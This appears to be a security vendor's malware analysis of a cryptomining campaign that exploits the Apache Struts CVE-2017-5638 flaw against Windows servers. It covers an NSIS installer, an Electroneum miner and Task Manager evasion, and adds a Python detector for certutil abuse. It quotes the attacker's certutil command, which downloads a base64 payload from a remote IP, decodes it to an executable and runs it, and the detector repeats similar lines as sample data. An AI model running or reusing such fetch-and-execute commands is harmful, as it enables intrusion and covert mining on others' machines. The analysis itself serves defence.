Since July of 2017, F5 researchers have been monitoring a campaign exploiting the Apache Struts 2 Jakarta Multipart Parser remote code execution (RCE) vulnerability (CVE-2017-5638). This campaign began by infecting Struts systems running on the Linux operating system to mine Electroneum crypto-currency. As is often the case, as time passed the attackers decided to expand their mining operations to new targets.
In Figure 1, an example of the original attack request shows that the attackers were initially injecting a Linux shell payload that used the built-in Linux “wget” and “curl” tools to download the miner malware and add it as a “cron” job for persistence.
In mid-March, 2018, F5 researchers observed a shift in the existing campaign wherein the injected payload changed to target Windows-based Struts servers.
As shown in Figure 2, the latest attack requests target the same URL, keeping the same HTTP header values and the same exploit structure; however, they now use Windows shell commands to download and execute a file.
While Linux ships with built-in command-line HTTP client tools like “curl” and “wget”, Windows doesn’t have parallel tools. The common alternative is to either write a Visual Basic or a PowerShell script or use the Windows BITSAdmin tool, which is typically used to create download and upload jobs. We have already witnessed attackers leveraging BITSAdmin in other campaigns. However, the current attackers chose to use a more creative technique, as the following injected commands show:
certutil -urlcache -split -f http://22.214.171.124/update.b64 update.b64 & certutil -decode update.b64 update.exe & update.exe
The attacker uses a command-line tool named “certutil” which, as described by Microsoft below, is part of the Windows operating system.
“Certutil.exe is a command-line program that is installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.”
However, a lesser-known feature of the tool is fetching and caching certificate files from remote hosts using the “urlcache” flag. This is useful in attack scenarios and even provides a simple evasion capability, because the payload can be transferred in the base64-encoded certificate format, as shown in Figure 3.
Once the file is downloaded and base64-decoded using certutil, it is saved as update.exe and executed.
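As an added illustration (not code from the F5 write-up), the following Python detection logic flags the certutil download-and-decode chain described above in process-creation events. The events, the parent-process list and the URL are constructed assumptions; the only page-derived element is the certutil flag sequence.

```python
"""Flag certutil download-and-decode chains in process-creation events.

Added example, not part of the original article. Event tuples are
(parent image, child image, command line); they are constructed to
resemble the chain in the article, with a documentation-range IP.
"""
import re

# Constructed sample events (assumed log format, not real telemetry).
SAMPLE_EVENTS = [
    ("java.exe", "cmd.exe",
     r"cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/update.b64 update.b64"),
    ("java.exe", "certutil.exe",
     r"certutil -decode update.b64 update.exe"),
    ("explorer.exe", "certutil.exe",
     r"certutil -dump corp-root.cer"),                    # benign admin use
    ("svchost.exe", "certutil.exe",
     r"certutil -urlcache -f http://crl.example.invalid/root.crl root.crl"),
]

# Assumed: Struts runs under a Java process, so these parents are suspicious.
WEB_SERVER_PARENTS = {"java.exe", "javaw.exe", "tomcat8.exe", "tomcat9.exe"}


def classify(parent, image, cmdline):
    """Return a list of finding tags for one process-creation event."""
    findings = []
    lc = cmdline.lower()
    if "certutil" not in lc:
        return findings
    # -urlcache together with -f fetches an arbitrary URL to disk.
    if re.search(r"-urlcache\b", lc) and re.search(r"\s-f\b", lc) and "http" in lc:
        findings.append("certutil_download")
    # -decode turns a base64 text file back into a binary.
    if re.search(r"-decode\b", lc):
        findings.append("certutil_decode")
        if re.search(r"\.exe\b", lc):
            findings.append("decode_to_exe")
    # A Java web-server parent launching certutil points at injected RCE.
    if findings and parent.lower() in WEB_SERVER_PARENTS:
        findings.append("spawned_by_web_server")
    return findings


def scan(events):
    """Return (command line, findings) for every event that raised a finding."""
    hits = []
    for parent, image, cmd in events:
        found = classify(parent, image, cmd)
        if found:
            hits.append((cmd, found))
    return hits
```

The fourth sample (a CRL fetch from svchost.exe) shows why the parent-process tag matters: urlcache alone also fires on legitimate certificate maintenance, so the web-server parent is what should drive alert priority.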
As shown in Figure 4, the metadata for the file indicates that the executable file most likely was created on January 30, 2018.
The file itself is a Windows installer that was created using the legitimate NSIS (Nullsoft Scriptable Install System) tool.
“NSIS (Nullsoft Scriptable Install System) is a professional open source system to create Windows installers. It is designed to be as small and flexible as possible and is therefore very suitable for internet distribution.”
While most malware implements its own downloader to evade detection, the current attacker is not even trying to hide and is using a more obvious way to install it, one that requires only scripting knowledge.
The installer script language is compatible with all major versions of Windows and provides an easy API to interact with different components of the operating system using simple syntax.
The installer contains three DLL files that are part of the NSIS system and enable it to execute certain commands.
Once the installer is executed, it sleeps for 16 seconds and checks for the presence of ESET antivirus on the vulnerable machine. There is no obvious explanation why the attacker chose to check specifically for ESET antivirus.
If ESET antivirus is present, the installer uses nsisdl.dll to download a file called nod.lock and stops the installation process. Unfortunately, we were not able to obtain this file during the analysis of the campaign. Strangely, the file is neither executed nor mentioned further in the code.
If ESET antivirus is not present on the vulnerable machine, the installer checks the operating system architecture using the system.dll plug-in and downloads “msi32.zip” or “msi64.zip” accordingly.
The archive, which contains only a few files, is downloaded to the %appdata%/MSSearchIndexer folder and unzipped using the ZipDLL.dll module. The zip archive is then removed from the target system.
The installer then executes the malicious MSSearchIndexer.exe file, which in turn starts the mssearch.exe file. The reason behind this execution chain is explained below.
For persistence, the installer adds a registry entry to run this file on startup.
The extracted mssearch.exe file is a fork of the cpuminer project called CPUMiner-Multi. The main difference between the two miners is that CPUMiner-Multi supports more algorithms than the original. In this case, the miner is configured to mine the Electroneum (ETN) cryptocurrency.
Looking at the search.cf miner configuration file, we can see the mining pool address along with the wallet public address.
The pool server itself is located in Germany, as shown in Figure 14.
To date, the Windows operation does not seem to be especially profitable: the amount mined over a few days is only about $20.00, not the large payouts we’ve seen from other cryptomining campaigns.
As mentioned before, the MSSearchIndexer.exe executable starts the mssearch.exe miner, and it is also responsible for hiding the mining operation.
Because an infected user might try to find out why their machine is so slow by opening the Windows Task Manager to view CPU and memory usage, the process constantly checks whether Windows Task Manager is open on the target system. If it is, the mssearch.exe process is killed, or is not started at all if Task Manager is already open. This can be seen in Figures 17 – 20.
Once Task Manager is closed, MSSearchIndexer.exe starts the mining process again.
Crypto-mining campaigns are very popular nowadays, and the Monero (XMR) currency is the common choice for cybercrime. This campaign is an interesting example of attackers shifting operations to mine another currency. Both Monero and Electroneum use the CryptoNight algorithm, which is just as suitable for mining on a CPU as on a GPU. This explains why the attackers chose to mine on compromised web servers. Because Electroneum and Monero are not the only cryptocurrencies with this property, we can expect attackers to extend their campaigns to other cryptocurrencies in the future.
To prevent this attack on your applications, patch the Apache Struts 2 Jakarta Multipart Parser remote code execution vulnerability (CVE-2017-5638) and/or deploy a web application firewall to block the attack.